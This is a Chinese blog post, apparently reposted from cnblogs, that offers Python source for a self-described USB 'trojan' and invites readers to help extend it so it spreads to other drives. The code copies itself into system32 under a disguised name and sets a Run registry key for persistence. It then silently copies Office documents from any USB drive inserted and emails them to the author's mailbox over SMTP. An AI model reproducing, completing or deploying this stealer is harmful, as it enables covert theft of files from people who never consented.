标签:c style class blog code java
原本是想制作一个类似于U盘木马的东东,目前能用户运行程序后实现自我复制到电脑电脑并开机启动,可以随时监控U盘,自动下载电脑上U盘里资料,后台发送给自己,想实现的功能有:最好可以自动侵染到U盘中,以后U盘再插入其他电脑时,可以继续复制
写得非常粗糙,有感兴趣的,大家可以一起完成,私信我
# -*- coding: cp936 -*- #foolyc CSDN博客:http://blog.csdn.net/foolyc #博客园:http://www.cnblogs.com/foolyc/ import win32file import shutil import os import time import _winreg import subprocess import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart def addtoautorun(): #修改注册表将程序改为开机启动 key=_winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE,r‘SOFTWARE\Microsoft\Windows\CurrentVersion\Run‘,0,_winreg.KEY_WRITE) _winreg.SetValueEx(key,"UDiskBee",0,_winreg.REG_SZ,r‘C:/WINDOWS/system32/UDiskBee.exe‘) def getremovabledisk(): drives=[] sign=win32file.GetLogicalDrives() drive_all=["A:\\","B:\\","C:\\","D:\\","E:\\","F:\\","G:\\","H:\\","I:\\", "J:\\","K:\\","L:\\","M:\\","N:\\","O:\\","P:\\","Q:\\","R:\\", "S:\\","T:\\","U:\\","V:\\","W:\\","X:\\","Y:\\","Z:\\"] for i in range(25): if (sign&1<<i): if win32file.GetDriveType(drive_all[i])==2: free_bytes,total_bytes,total_free_bytes=win32file.GetDiskFreeSpaceEx(drive_all[i]) if (total_bytes/1024/1024/1024)<17: drives.append(drive_all[i]) return drives def copyfile(drives): target_dir=‘D:/foolbak/‘ if not os.path.exists(target_dir): os.makedirs(target_dir) today=target_dir+time.strftime(‘%Y%m%d%H%M‘)+‘/‘ if not os.path.exists(today): os.makedirs(today) for udisk in drives: for root, dirs, files in os.walk(udisk): for one in files: type = os.path.splitext(one)[1] if type == ".ppt" or type == ".pptx" or type == ".doc" or type == "docx" : if len(root)>3 and not os.path.exists(today+root[3:]): os.makedirs(today+root[3:]) shutil.copy(root+‘/‘+one,today+root[3:]+‘/‘+one) def sendfile(filepath): from_mail=‘**@163.com‘ to_mail=‘**@qq.com‘ msg=MIMEMultipart() msg[‘From‘]=from_mail msg[‘To‘]=to_mail msg[‘Subject‘]=‘subject‘ content=MIMEText(open(filepath, ‘r‘).read(), ‘base64‘, ‘gb2312‘) content["Content-Type"] = ‘application/octet-stream‘ content.add_header(‘content-disposition‘,‘attachment‘,filename=filepath) msg.attach(content) server=smtplib.SMTP(‘smtp.163.com‘) server.docmd(‘ehlo‘,‘**@163.com‘) server.login(‘**@163.com‘,‘**‘) server.sendmail(from_mail,to_mail,msg.as_string()) server.quit() def sendall(): for root, dirs, files in os.walk(‘D:/foolbak/‘): for one in files: tempfile=root+‘/‘+one sendfile(tempfile) time.sleep(30) if __name__=="__main__": if not os.path.isfile(‘C:/WINDOWS/system32/UDiskBee.exe‘): shutil.copy(os.getcwd()+‘/‘+‘UDiskBee.exe‘,‘C:/WINDOWS/system32/UDiskBee.exe‘) addtoautorun() subprocess.Popen(‘C:/WINDOWS/system32/UDiskBee.exe‘) else : drives_bk=[] while 1: time.sleep(20) drives=getremovabledisk() if (drives!=drives_bk)&(len(drives_bk)<len(drives)): #new U Disk drives_bk=drives copyfile(drives) sendall() if (drives!=drives_bk)&(len(drives_bk)>len(drives)): #Disk remove drives_bk=drives
参考资料:
http://www.cnblogs.com/xiaowuyi/archive/2012/03/17/2404015.html
U盘资料窃取(复制+开机启动+后台发送),布布扣,bubuko.com
标签:c style class blog code java
原文地址:http://www.cnblogs.com/foolyc/p/3779036.html
